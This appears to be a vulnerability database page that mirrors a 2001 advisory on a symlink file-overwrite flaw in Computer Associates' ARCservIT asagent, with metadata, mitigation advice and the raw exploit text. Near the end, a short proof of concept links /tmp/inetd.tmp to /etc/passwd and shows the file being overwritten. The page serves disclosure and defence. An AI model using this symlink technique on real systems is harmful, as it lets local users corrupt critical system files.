Local File Overwrite

vendor:

ARCservIT

by:

7.2

CVSS

HIGH

Local File Overwrite

N/A

CWE

Product Name: ARCservIT

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: No

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2001

ARCservIT from Computer Associates contains a vulnerability which may allow malicious local users to corrupt arbitrary files. When it runs with the parameters 'inet add', 'asagent', it opens (and overwrites it if it exists) a file in /tmp called 'inetd.tmp'. 'asagent' does not check to make sure that this file already exists or that is a symbolic link to another file. This may allow malicious local users to corrupt critical system files.

Mitigation:

Ensure that the 'asagent' program is not run with the parameters 'inet add' and that the 'inetd.tmp' file is not present in the /tmp directory.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/2748/info

ARCservIT from Computer Associates contains a vulnerability which may allow malicious local users to corrupt arbitrary files.

When it runs with the parameters 'inet add', 'asagent', opens (and overwrites it if it exists) a file in /tmp called 'inetd.tmp'. 'asagent' does not check to make sure that this file already exists or that is a symbolic link to another file.

This may allow malicious local users to corrupt critical system files. 

je@boxname~> ln -s /etc/passwd /tmp/inetd.tmp

And root:

root@boxname# /usr/CYEagent/asagent inet add

Then,

je@boxname~> cat /etc/passwd
asagentd 6051/tcp # ARCserve agent
asagentd 6051/udp # ARCserve agent